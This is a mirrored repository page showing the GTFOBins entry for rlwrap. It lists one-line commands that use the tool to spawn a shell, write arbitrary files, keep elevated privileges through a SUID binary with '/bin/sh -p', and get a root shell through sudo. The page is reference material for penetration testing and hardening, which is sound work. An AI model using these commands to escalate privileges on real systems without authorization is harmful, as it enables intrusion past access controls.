1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-19 10:09:17 +02:00
GTFOBins.github.io/_gtfobins/rlwrap.md
2018-10-05 18:55:38 +01:00

345 B

functions
shell file-write suid sudo
code
rlwrap /bin/sh
description code
This adds timestamps to the output file. This relies on the external `echo` command. LFILE=file_to_write rlwrap -l "$LFILE" echo DATA
code
./rlwrap -H /dev/null /bin/sh -p
code
sudo rlwrap /bin/sh